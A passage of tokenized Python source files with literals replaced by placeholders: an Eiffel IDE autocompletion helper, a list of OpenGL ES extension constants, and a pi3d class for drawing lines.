col - <NUM_LIT:1> ) <EOL> if start < <NUM_LIT:0> : <EOL> result = col <EOL> else : <EOL> result = start <EOL> else : <EOL> result = <NUM_LIT:0> <EOL> return result <EOL> def match_list_feature ( a_list , a_base ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> for element in a_list : <EOL> if a_base . upper ( ) == element [ <NUM_LIT:0> ] [ : len ( a_base ) ] . upper ( ) : <EOL> result . append ( element [ <NUM_LIT:0> ] ) <EOL> return result <EOL> def get_local_variable ( a_project ) : <EOL> """<STR_LIT>""" <EOL> do_regex = a_project . get_tools_regex ( "<STR_LIT>" ) <EOL> deferred_regex = a_project . get_tools_regex ( "<STR_LIT>" ) <EOL> local_regex = a_project . get_tools_regex ( "<STR_LIT>" ) <EOL> require_regex = a_project . get_tools_regex ( "<STR_LIT>" ) <EOL> ensure_regex = a_project . get_tools_regex ( "<STR_LIT>" ) <EOL> text_list = environment . text_list ( ) <EOL> i = environment . get_cursor_row ( ) <EOL> is_cancel_syntax_founded = False <EOL> do_row = - <NUM_LIT:1> <EOL> l_result = [ ] <EOL> while not is_cancel_syntax_founded and do_row < <NUM_LIT:0> and i >= <NUM_LIT:0> : <EOL> if require_regex . search ( text_list [ i ] ) or deferred_regex . search ( text_list [ i ] ) : <EOL> is_cancel_syntax_founded = True <EOL> elif do_regex . search ( text_list [ i ] ) : <EOL> do_row = i <EOL> i = i - <NUM_LIT:1> <EOL> while not is_cancel_syntax_founded and i >= <NUM_LIT:0> and not local_regex . search ( text_list [ i ] ) : <EOL> if require_regex . search ( text_list [ i ] ) or do_regex . search ( text_list [ i ] ) or ensure_regex . search ( text_list [ i ] ) : <EOL> l_result = [ ] <EOL> is_cancel_syntax_founded = True <EOL> else : <EOL> l_variables = get_variable_from_line ( a_project , text_list [ i ] ) <EOL> if l_variables : <EOL> l_result . extend ( l_variables ) <EOL> i = i - <NUM_LIT:1> <EOL> return l_result <EOL> def complete_class_match ( a_project , a_base ) : <EOL> """<STR_LIT>""" <EOL> matches = eiffel_ide . match_list_class ( a_project . class_list ( ) , a_base ) <EOL> return str ( matches ) <EOL> def is_cursor_on_client_call ( ) : <EOL> """<STR_LIT>""" <EOL> l_start = complete_start ( ) - <NUM_LIT:1> <EOL> row = environment . get_cursor_row ( ) <EOL> l_previous_white = environment . previous_non_white_character_in_row ( row , <EOL> l_start ) <EOL> result = False <EOL> if l_previous_white >= <NUM_LIT:0> : <EOL> result = environment . text_list ( ) [ row ] [ l_previous_white ] == "<STR_LIT:.>" <EOL> return result <EOL> def get_associated_bracket_position ( a_row , a_col ) : <EOL> """<STR_LIT>""" <EOL> l_text = environment . text_list ( ) [ a_row ] <EOL> l_character = l_text [ a_col ] <EOL> l_result = a_col <EOL> if l_character in ( "<STR_LIT:(>" , "<STR_LIT:[>" , "<STR_LIT:{>" ) : <EOL> l_incrementation = <NUM_LIT:1> <EOL> l_search = ( "<STR_LIT:)>" , "<STR_LIT:]>" , "<STR_LIT:}>" ) [ ( "<STR_LIT:(>" , "<STR_LIT:[>" , "<STR_LIT:{>" ) . index ( l_character ) ] <EOL> elif l_character in ( "<STR_LIT:)>" , "<STR_LIT:]>" , "<STR_LIT:}>" ) : <EOL> l_incrementation = - <NUM_LIT:1> <EOL> l_search = ( "<STR_LIT:(>" , "<STR_LIT:[>" , "<STR_LIT:{>" ) [ ( "<STR_LIT:)>" , "<STR_LIT:]>" , "<STR_LIT:}>" ) . index ( l_character ) ] <EOL> else : <EOL> l_incrementation = <NUM_LIT:0> <EOL> if l_incrementation != <NUM_LIT:0> : <EOL> l_result = l_result + l_incrementation <EOL> while l_result >= <NUM_LIT:0> and l_result < len ( l_text ) and l_text [ l_result ] != l_search : <EOL> if l_text [ l_result ] == l_character : <EOL> l_result = get_associated_bracket_position ( a_row , l_result ) <EOL> l_result = l_result + l_incrementation <EOL> if l_result > len ( l_text ) : <EOL> l_result = <NUM_LIT:0> <EOL> return l_result <EOL> def create_row_object_stack ( ) : <EOL> """<STR_LIT>""" <EOL> l_row = environment . get_cursor_row ( ) <EOL> non_splittable_characters = string . ascii_letters + string . digits + "<STR_LIT:_>" <EOL> l_col = complete_start ( ) - <NUM_LIT:1> <EOL> l_col = environment . previous_non_white_character_in_row ( l_row , l_col ) <EOL> l_text = environment . text_of_cursor_row ( ) <EOL> l_result = [ ] <EOL> while l_col > <NUM_LIT:0> and l_text [ l_col ] == "<STR_LIT:.>" : <EOL> l_col = l_col - <NUM_LIT:1> <EOL> l_col = environment . previous_non_white_character_in_row ( l_row , l_col ) <EOL> while l_col >= <NUM_LIT:0> and l_text [ l_col ] in ( "<STR_LIT:)>" , "<STR_LIT:]>" ) : <EOL> l_col = get_associated_bracket_position ( l_row , l_col ) <EOL> if l_col < <NUM_LIT:0> : <EOL> l_result = [ ] <EOL> l_col = environment . previous_non_white_character_in_row ( l_row , <EOL> l_col - <NUM_LIT:1> ) <EOL> if l_col >= <NUM_LIT:0> and l_text [ l_col ] in non_splittable_characters : <EOL> l_new_col = environment . start_column_of_word ( l_row , l_col ) <EOL> if l_text [ l_new_col ] in string . digits : <EOL> l_result = [ ] <EOL> l_col = - <NUM_LIT:1> <EOL> else : <EOL> l_result . append ( l_text [ l_new_col : l_col + <NUM_LIT:1> ] ) <EOL> l_col = l_new_col <EOL> l_col = environment . previous_non_white_character_in_row ( <EOL> l_row , l_col - <NUM_LIT:1> ) <EOL> else : <EOL> l_col = - <NUM_LIT:1> <EOL> return l_result <EOL> def retreive_value_from_pair ( a_key , a_pair_list ) : <EOL> """<STR_LIT>""" <EOL> l_result = None <EOL> i = <NUM_LIT:0> <EOL> while i >= <NUM_LIT:0> and a_pair_list [ i ] [ <NUM_LIT:0> ] != a_key : <EOL> i = i + <NUM_LIT:1> <EOL> if i >= <NUM_LIT:0> : <EOL> l_result = a_pair_list [ i ] [ <NUM_LIT:1> ] <EOL> return l_result <EOL> def index_of_key_in_pair ( a_key , a_pair_list ) : <EOL> """<STR_LIT>""" <EOL> i = len ( a_pair_list ) - <NUM_LIT:1> <EOL> while i >= <NUM_LIT:0> and a_pair_list [ i ] [ <NUM_LIT:0> ] != a_key : <EOL> i = i - <NUM_LIT:1> <EOL> return i <EOL> def translate_generics_to_class ( a_class_generics , a_object_generics , <EOL> a_class_name ) : <EOL> """<STR_LIT>""" <EOL> l_object_generics = a_object_generics . replace ( "<STR_LIT:U+0020>" , "<STR_LIT>" ) . replace ( "<STR_LIT:\t>" , "<STR_LIT>" ) . split ( "<STR_LIT:U+002C>" ) <EOL> l_result = None <EOL> i = <NUM_LIT:0> <EOL> while i < len ( a_class_generics ) and a_class_generics [ i ] != a_class_name : <EOL> i = i + <NUM_LIT:1> <EOL> l_result = None <EOL> if i < len ( l_object_generics ) : <EOL> l_result = l_object_generics [ i ] <EOL> return l_result <EOL> def get_variable_from_line ( a_project , a_variable_line ) : <EOL> """<STR_LIT>""" <EOL> l_variable_regex = a_project . get_tools_regex ( "<STR_LIT>" ) <EOL> l_variable_values = l_variable_regex . findall ( a_variable_line ) <EOL> l_result = [ ] <EOL> if l_variable_values : <EOL> l_variable_names = l_variable_values [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] . replace ( "<STR_LIT:U+0020>" , "<STR_LIT>" ) . replace ( "<STR_LIT:\t>" , "<STR_LIT>" ) . split ( "<STR_LIT:U+002C>" ) <EOL> for name in l_variable_names : <EOL> l_result . append ( ( name , l_variable_values [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , <EOL> l_variable_values [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] , "<STR_LIT>" ) ) <EOL> return l_result <EOL> def get_arguments_from_lines ( a_project , a_arguments_line ) : <EOL> """<STR_LIT>""" <EOL> l_type_list = a_arguments_line . split ( "<STR_LIT:;>" ) <EOL> l_argument_list = [ ] <EOL> for element in l_type_list : <EOL> l_variables = get_variable_from_line ( a_project , element ) <EOL> if l_variables : <EOL> l_argument_list . extend ( l_variables ) <EOL> return l_argument_list <EOL> def get_result_and_arguments ( a_project ) : <EOL> """<STR_LIT>""" <EOL> l_signature_row = eiffel_ide . find_last_routine_header ( a_project ) <EOL> l_signature_regex = a_project . get_tools_regex ( "<STR_LIT>" ) <EOL> l_signature_values = l_signature_regex . findall ( environment . text_list ( ) [ l_signature_row ] ) <EOL> l_result = [ ] <EOL> if l_signature_values [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] : <EOL> l_result . append ( ( "<STR_LIT>" , l_signature_values [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , <EOL> l_signature_values [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] , "<STR_LIT>" ) ) <EOL> l_result . extend ( get_arguments_from_lines ( a_project , <EOL> l_signature_values [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) ) <EOL> return l_result <EOL> def class_and_features_of_client_call ( a_project ) : <EOL> """<STR_LIT>""" <EOL> l_features = a_project . feature_list ( get_class_from_buffer ( a_project ) ) <EOL> l_features . extend ( get_local_variable ( a_project ) ) <EOL> l_features . extend ( get_result_and_arguments ( a_project ) ) <EOL> l_stack = create_row_object_stack ( ) <EOL> l_old_class = None <EOL> l_class = None <EOL> l_generics = None <EOL> l_index = - <NUM_LIT:1> <EOL> i = len ( l_stack ) - <NUM_LIT:1> <EOL> l_abort = False <EOL> while i >= <NUM_LIT:0> and not l_abort : <EOL> l_index = index_of_key_in_pair ( l_stack [ i ] , l_features ) <EOL> if l_index >= <NUM_LIT:0> : <EOL> l_old_class = l_class <EOL> l_class = l_features [ l_index ] [ <NUM_LIT:1> ] <EOL> l_old_generics = l_generics <EOL> l_generics = l_features [ l_index ] [ <NUM_LIT:2> ] <EOL> if l_class : <EOL> l_features = a_project . exported_feature_list ( l_class ) <EOL> if not l_features and l_old_class and l_old_generics : <EOL> l_class_generics = a_project . class_generic ( l_old_class ) <EOL> if l_class_generics : <EOL> l_new_class = translate_generics_to_class ( l_class_generics , <EOL> l_old_generics , <EOL> l_class ) <EOL> if l_new_class : <EOL> l_class = l_new_class <EOL> l_features = a_project . exported_feature_list ( l_class ) <EOL> else : <EOL> l_features = [ ] <EOL> l_abort = True <EOL> else : <EOL> l_features = [ ] <EOL> l_abort = True <EOL> i = i - <NUM_LIT:1> <EOL> return ( l_class , l_features ) <EOL> def complete_feature_match ( a_project , a_base ) : <EOL> """<STR_LIT>""" <EOL> matches = [ ] <EOL> if is_cursor_on_client_call ( ) : <EOL> l_list = class_and_features_of_client_call ( a_project ) [ <NUM_LIT:1> ] <EOL> l_not_obsolete_feature = [ ] <EOL> for element in l_list : <EOL> if not element [ <NUM_LIT:3> ] : <EOL> l_not_obsolete_feature . append ( element ) <EOL> if l_not_obsolete_feature : <EOL> matches = match_list_feature ( l_not_obsolete_feature , a_base ) <EOL> else : <EOL> l_list = a_project . feature_list ( get_class_from_buffer ( a_project ) ) <EOL> l_list . extend ( get_local_variable ( a_project ) ) <EOL> l_list . extend ( get_result_and_arguments ( a_project ) ) <EOL> matches = match_list_feature ( l_list , a_base ) <EOL> matches . sort ( key = lambda mbr : mbr . lower ( ) ) <EOL> result = "<STR_LIT:[>" <EOL> is_first = True <EOL> for match in matches : <EOL> if is_first : <EOL> result = result + "<STR_LIT>" + match + "<STR_LIT>" <EOL> is_first = False <EOL> else : <EOL> result = result + "<STR_LIT>" + match + "<STR_LIT>" <EOL> result = result + "<STR_LIT:]>" <EOL> return result <EOL> def complete_creator_match ( a_project , a_base ) : <EOL> """<STR_LIT>""" <EOL> matches = [ ] <EOL> if is_cursor_on_client_call ( ) : <EOL> l_features = a_project . feature_list ( get_class_from_buffer ( a_project ) ) <EOL> l_features . extend ( get_local_variable ( a_project ) ) <EOL> l_features . extend ( get_result_and_arguments ( a_project ) ) <EOL> l_stack = create_row_object_stack ( ) <EOL> if l_stack : <EOL> l_index = index_of_key_in_pair ( l_stack [ <NUM_LIT:0> ] , l_features ) <EOL> if l_index >= <NUM_LIT:0> : <EOL> l_class = l_features [ l_index ] [ <NUM_LIT:1> ] <EOL> if l_class : <EOL> matches = match_list_feature ( <EOL> a_project . creators_list ( l_class ) , a_base ) <EOL> matches . sort ( key = lambda mbr : mbr . lower ( ) ) <EOL> result = "<STR_LIT:[>" <EOL> is_first = True <EOL> for match in matches : <EOL> if is_first : <EOL> result = result + "<STR_LIT>" + match + "<STR_LIT>" <EOL> is_first = False <EOL> else : <EOL> result = result + "<STR_LIT>" + match + "<STR_LIT>" <EOL> result = result + "<STR_LIT:]>" <EOL> return result </s>
<s> """<STR_LIT>""" <EOL> GL_ETC1_RGB8_OES = <NUM_LIT> <EOL> GL_PALETTE4_RGB8_OES = <NUM_LIT> <EOL> GL_PALETTE4_RGBA8_OES = <NUM_LIT> <EOL> GL_PALETTE4_R5_G6_B5_OES = <NUM_LIT> <EOL> GL_PALETTE4_RGBA4_OES = <NUM_LIT> <EOL> GL_PALETTE4_RGB5_A1_OES = <NUM_LIT> <EOL> GL_PALETTE8_RGB8_OES = <NUM_LIT> <EOL> GL_PALETTE8_RGBA8_OES = <NUM_LIT> <EOL> GL_PALETTE8_R5_G6_B5_OES = <NUM_LIT> <EOL> GL_PALETTE8_RGBA4_OES = <NUM_LIT> <EOL> GL_PALETTE8_RGB5_A1_OES = <NUM_LIT> <EOL> GL_DEPTH_COMPONENT24_OES = <NUM_LIT> <EOL> GL_DEPTH_COMPONENT32_OES = <NUM_LIT> <EOL> GL_TEXTURE_EXTERNAL_OES = <NUM_LIT> <EOL> GL_SAMPLER_EXTERNAL_OES = <NUM_LIT> <EOL> GL_TEXTURE_BINDING_EXTERNAL_OES = <NUM_LIT> <EOL> GL_REQUIRED_TEXTURE_IMAGE_UNITS_OES = <NUM_LIT> <EOL> GL_UNSIGNED_INT = <NUM_LIT> <EOL> GL_PROGRAM_BINARY_LENGTH_OES = <NUM_LIT> <EOL> GL_NUM_PROGRAM_BINARY_FORMATS_OES = <NUM_LIT> <EOL> GL_PROGRAM_BINARY_FORMATS_OES = <NUM_LIT> <EOL> GL_WRITE_ONLY_OES = <NUM_LIT> <EOL> GL_BUFFER_ACCESS_OES = <NUM_LIT> <EOL> GL_BUFFER_MAPPED_OES = <NUM_LIT> <EOL> GL_BUFFER_MAP_POINTER_OES = <NUM_LIT> <EOL> GL_DEPTH_STENCIL_OES = <NUM_LIT> <EOL> GL_UNSIGNED_INT_24_8_OES = <NUM_LIT> <EOL> GL_DEPTH24_STENCIL8_OES = <NUM_LIT> <EOL> GL_RGB8_OES = <NUM_LIT> <EOL> GL_RGBA8_OES = <NUM_LIT> <EOL> GL_FRAGMENT_SHADER_DERIVATIVE_HINT_OES = <NUM_LIT> <EOL> GL_STENCIL_INDEX1_OES = <NUM_LIT> <EOL> GL_STENCIL_INDEX4_OES = <NUM_LIT> <EOL> GL_TEXTURE_WRAP_R_OES = <NUM_LIT> <EOL> GL_TEXTURE_3D_OES = <NUM_LIT> <EOL> GL_TEXTURE_BINDING_3D_OES = <NUM_LIT> <EOL> GL_MAX_3D_TEXTURE_SIZE_OES = <NUM_LIT> <EOL> GL_SAMPLER_3D_OES = <NUM_LIT> <EOL> GL_FRAMEBUFFER_ATTACHMENT_TEXTURE_3D_ZOFFSET_OES = <NUM_LIT> <EOL> GL_HALF_FLOAT_OES = <NUM_LIT> <EOL> GL_VERTEX_ARRAY_BINDING_OES = <NUM_LIT> <EOL> GL_UNSIGNED_INT_10_10_10_2_OES = <NUM_LIT> <EOL> GL_INT_10_10_10_2_OES = <NUM_LIT> <EOL> GL_3DC_X_AMD = <NUM_LIT> <EOL> GL_3DC_XY_AMD = <NUM_LIT> <EOL> GL_ATC_RGB_AMD = <NUM_LIT> <EOL> GL_ATC_RGBA_EXPLICIT_ALPHA_AMD = <NUM_LIT> <EOL> GL_ATC_RGBA_INTERPOLATED_ALPHA_AMD = <NUM_LIT> <EOL> GL_COUNTER_TYPE_AMD = <NUM_LIT> <EOL> GL_COUNTER_RANGE_AMD = <NUM_LIT> <EOL> GL_UNSIGNED_INT64_AMD = <NUM_LIT> <EOL> GL_PERCENTAGE_AMD = <NUM_LIT> <EOL> GL_PERFMON_RESULT_AVAILABLE_AMD = <NUM_LIT> <EOL> GL_PERFMON_RESULT_SIZE_AMD = <NUM_LIT> <EOL> GL_PERFMON_RESULT_AMD = <NUM_LIT> <EOL> GL_Z400_BINARY_AMD = <NUM_LIT> <EOL> GL_READ_FRAMEBUFFER_ANGLE = <NUM_LIT> <EOL> GL_DRAW_FRAMEBUFFER_ANGLE = <NUM_LIT> <EOL> GL_DRAW_FRAMEBUFFER_BINDING_ANGLE = <NUM_LIT> <EOL> GL_READ_FRAMEBUFFER_BINDING_ANGLE = <NUM_LIT> <EOL> GL_RENDERBUFFER_SAMPLES_ANGLE = <NUM_LIT> <EOL> GL_FRAMEBUFFER_INCOMPLETE_MULTISAMPLE_ANGLE = <NUM_LIT> <EOL> GL_MAX_SAMPLES_ANGLE = <NUM_LIT> <EOL> GL_RGB_422_APPLE = <NUM_LIT> <EOL> GL_UNSIGNED_SHORT_8_8_APPLE = <NUM_LIT> <EOL> GL_UNSIGNED_SHORT_8_8_REV_APPLE = <NUM_LIT> <EOL> GL_RENDERBUFFER_SAMPLES_APPLE = <NUM_LIT> <EOL> GL_FRAMEBUFFER_INCOMPLETE_MULTISAMPLE_APPLE = <NUM_LIT> <EOL> GL_MAX_SAMPLES_APPLE = <NUM_LIT> <EOL> GL_READ_FRAMEBUFFER_APPLE = <NUM_LIT> <EOL> GL_DRAW_FRAMEBUFFER_APPLE = <NUM_LIT> <EOL> GL_DRAW_FRAMEBUFFER_BINDING_APPLE = <NUM_LIT> <EOL> GL_READ_FRAMEBUFFER_BINDING_APPLE = <NUM_LIT> <EOL> GL_BGRA_EXT = <NUM_LIT> <EOL> GL_TEXTURE_MAX_LEVEL_APPLE = <NUM_LIT> <EOL> GL_MALI_SHADER_BINARY_ARM = <NUM_LIT> <EOL> GL_MIN_EXT = <NUM_LIT> <EOL> GL_MAX_EXT = <NUM_LIT> <EOL> GL_COLOR_EXT = <NUM_LIT> <EOL> GL_DEPTH_EXT = <NUM_LIT> <EOL> GL_STENCIL_EXT = <NUM_LIT> <EOL> GL_BGRA_EXT = <NUM_LIT> <EOL> GL_UNSIGNED_SHORT_4_4_4_4_REV_EXT = <NUM_LIT> <EOL> GL_UNSIGNED_SHORT_1_5_5_5_REV_EXT = <NUM_LIT> <EOL> GL_TEXTURE_MAX_ANISOTROPY_EXT = <NUM_LIT> <EOL> GL_MAX_TEXTURE_MAX_ANISOTROPY_EXT = <NUM_LIT> <EOL> GL_BGRA_EXT = <NUM_LIT> <EOL> GL_UNSIGNED_INT_2_10_10_10_REV_EXT = <NUM_LIT> <EOL> GL_COMPRESSED_RGB_S3TC_DXT1_EXT = <NUM_LIT> <EOL> GL_COMPRESSED_RGBA_S3TC_DXT1_EXT = <NUM_LIT> <EOL> GL_UNPACK_ROW_LENGTH = <NUM_LIT> <EOL> GL_UNPACK_SKIP_ROWS = <NUM_LIT> <EOL> GL_UNPACK_SKIP_PIXELS = <NUM_LIT> <EOL> GL_SHADER_BINARY_DMP = <NUM_LIT> <EOL> GL_SGX_PROGRAM_BINARY_IMG = <NUM_LIT> <EOL> GL_BGRA_IMG = <NUM_LIT> <EOL> GL_UNSIGNED_SHORT_4_4_4_4_REV_IMG = <NUM_LIT> <EOL> GL_SGX_BINARY_IMG = <NUM_LIT> <EOL> GL_COMPRESSED_RGB_PVRTC_4BPPV1_IMG = <NUM_LIT> <EOL> GL_COMPRESSED_RGB_PVRTC_2BPPV1_IMG = <NUM_LIT> <EOL> GL_COMPRESSED_RGBA_PVRTC_4BPPV1_IMG = <NUM_LIT> <EOL> GL_COMPRESSED_RGBA_PVRTC_2BPPV1_IMG = <NUM_LIT> <EOL> GL_RENDERBUFFER_SAMPLES_IMG = <NUM_LIT> <EOL> GL_FRAMEBUFFER_INCOMPLETE_MULTISAMPLE_IMG = <NUM_LIT> <EOL> GL_MAX_SAMPLES_IMG = <NUM_LIT> <EOL> GL_TEXTURE_SAMPLES_IMG = <NUM_LIT> <EOL> GL_COVERAGE_COMPONENT_NV = <NUM_LIT> <EOL> GL_COVERAGE_COMPONENT4_NV = <NUM_LIT> <EOL> GL_COVERAGE_ATTACHMENT_NV = <NUM_LIT> <EOL> GL_COVERAGE_BUFFERS_NV = <NUM_LIT> <EOL> GL_COVERAGE_SAMPLES_NV = <NUM_LIT> <EOL> GL_COVERAGE_ALL_FRAGMENTS_NV = <NUM_LIT> <EOL> GL_COVERAGE_EDGE_FRAGMENTS_NV = <NUM_LIT> <EOL> GL_COVERAGE_AUTOMATIC_NV = <NUM_LIT> <EOL> GL_COVERAGE_BUFFER_BIT_NV = <NUM_LIT> <EOL> GL_DEPTH_COMPONENT16_NONLINEAR_NV = <NUM_LIT> <EOL> GL_MAX_DRAW_BUFFERS_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER0_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER1_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER2_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER3_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER4_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER5_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER6_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER7_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER8_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER9_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER10_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER11_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER12_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER13_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER14_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER15_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT0_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT1_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT2_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT3_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT4_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT5_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT6_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT7_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT8_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT9_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT10_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT11_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT12_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT13_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT14_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT15_NV = <NUM_LIT> <EOL> GL_MAX_COLOR_ATTACHMENTS_NV = <NUM_LIT> <EOL> GL_ALL_COMPLETED_NV = <NUM_LIT> <EOL> GL_FENCE_STATUS_NV = <NUM_LIT> <EOL> GL_FENCE_CONDITION_NV = <NUM_LIT> <EOL> GL_READ_BUFFER_NV = <NUM_LIT> <EOL> GL_ALPHA_TEST_QCOM = <NUM_LIT> <EOL> GL_ALPHA_TEST_FUNC_QCOM = <NUM_LIT> <EOL> GL_ALPHA_TEST_REF_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_WIDTH_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_HEIGHT_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_DEPTH_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_INTERNAL_FORMAT_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_FORMAT_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_TYPE_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_IMAGE_VALID_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_NUM_LEVELS_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_TARGET_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_OBJECT_VALID_QCOM = <NUM_LIT> <EOL> GL_STATE_RESTORE = <NUM_LIT> <EOL> GL_PERFMON_GLOBAL_MODE_QCOM = <NUM_LIT> <EOL> GL_WRITEONLY_RENDERING_QCOM = <NUM_LIT> <EOL> GL_COLOR_BUFFER_BIT0_QCOM = <NUM_LIT> <EOL> GL_COLOR_BUFFER_BIT1_QCOM = <NUM_LIT> <EOL> GL_COLOR_BUFFER_BIT2_QCOM = <NUM_LIT> <EOL> GL_COLOR_BUFFER_BIT3_QCOM = <NUM_LIT> <EOL> GL_COLOR_BUFFER_BIT4_QCOM = <NUM_LIT> <EOL> GL_COLOR_BUFFER_BIT5_QCOM = <NUM_LIT> <EOL> GL_COLOR_BUFFER_BIT6_QCOM = <NUM_LIT> <EOL> GL_COLOR_BUFFER_BIT7_QCOM = <NUM_LIT> <EOL> GL_DEPTH_BUFFER_BIT0_QCOM = <NUM_LIT> <EOL> GL_DEPTH_BUFFER_BIT1_QCOM = <NUM_LIT> <EOL> GL_DEPTH_BUFFER_BIT2_QCOM = <NUM_LIT> <EOL> GL_DEPTH_BUFFER_BIT3_QCOM = <NUM_LIT> <EOL> GL_DEPTH_BUFFER_BIT4_QCOM = <NUM_LIT> <EOL> GL_DEPTH_BUFFER_BIT5_QCOM = <NUM_LIT> <EOL> GL_DEPTH_BUFFER_BIT6_QCOM = <NUM_LIT> <EOL> GL_DEPTH_BUFFER_BIT7_QCOM = <NUM_LIT> <EOL> GL_STENCIL_BUFFER_BIT0_QCOM = <NUM_LIT> <EOL> GL_STENCIL_BUFFER_BIT1_QCOM = <NUM_LIT> <EOL> GL_STENCIL_BUFFER_BIT2_QCOM = <NUM_LIT> <EOL> GL_STENCIL_BUFFER_BIT3_QCOM = <NUM_LIT> <EOL> GL_STENCIL_BUFFER_BIT4_QCOM = <NUM_LIT> <EOL> GL_STENCIL_BUFFER_BIT5_QCOM = <NUM_LIT> <EOL> GL_STENCIL_BUFFER_BIT6_QCOM = <NUM_LIT> <EOL> GL_STENCIL_BUFFER_BIT7_QCOM = <NUM_LIT> <EOL> GL_MULTISAMPLE_BUFFER_BIT0_QCOM = <NUM_LIT> <EOL> GL_MULTISAMPLE_BUFFER_BIT1_QCOM = <NUM_LIT> <EOL> GL_MULTISAMPLE_BUFFER_BIT2_QCOM = <NUM_LIT> <EOL> GL_MULTISAMPLE_BUFFER_BIT3_QCOM = <NUM_LIT> <EOL> GL_MULTISAMPLE_BUFFER_BIT4_QCOM = <NUM_LIT> <EOL> GL_MULTISAMPLE_BUFFER_BIT5_QCOM = <NUM_LIT> <EOL> GL_MULTISAMPLE_BUFFER_BIT6_QCOM = <NUM_LIT> <EOL> GL_MULTISAMPLE_BUFFER_BIT7_QCOM = <NUM_LIT> <EOL> GL_SHADER_BINARY_VIV = <NUM_LIT> </s>
<s> from __future__ import absolute_import , division , print_function , unicode_literals <EOL> from pi3d . constants import * <EOL> from pi3d . Buffer import Buffer <EOL> from pi3d . Shape import Shape <EOL> class Lines ( Shape ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , camera = None , light = None , vertices = [ ] , material = ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> line_width = <NUM_LIT:1> , closed = False , name = "<STR_LIT>" , x = <NUM_LIT:0.0> , y = <NUM_LIT:0.0> , z = <NUM_LIT:0.0> , <EOL> sx = <NUM_LIT:1.0> , sy = <NUM_LIT:1.0> , sz = <NUM_LIT:1.0> , rx = <NUM_LIT:0.0> , ry = <NUM_LIT:0.0> , rz = <NUM_LIT:0.0> , <EOL> cx = <NUM_LIT:0.0> , cy = <NUM_LIT:0.0> , cz = <NUM_LIT:0.0> , strip = True ) : <EOL> """<STR_LIT>""" <EOL> super ( Lines , self ) . __init__ ( camera , light , name , x , y , z , rx , ry , rz , <EOL> sx , sy , sz , cx , cy , cz ) <EOL> if VERBOSE : <EOL> print ( "<STR_LIT>" ) <EOL> self . vertices = vertices <EOL> self . normals = [ ] <EOL> n_v = len ( vertices ) <EOL> self . indices = [ [ a , a + <NUM_LIT:1> , a + <NUM_LIT:2> ] for a in range ( <NUM_LIT:0> , n_v , <NUM_LIT:3> ) ] <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:3> ) : <EOL> last = self . indices [ - <NUM_LIT:1> ] <EOL> if last [ i ] >= n_v : <EOL> last [ i ] = n_v - <NUM_LIT:1> <EOL> self . tex_coords = [ ] <EOL> self . buf = [ Buffer ( self , self . vertices , self . tex_coords , self . indices , <EOL> self . normals , smooth = False ) ] <EOL> if line_width < <NUM_LIT:1> : <EOL> self . set_line_width ( <NUM_LIT:1> , closed ) <EOL> else : <EOL> self . set_line_width ( line_width = line_width , closed = closed , strip = strip ) <EOL> self . set_material ( material ) </s>
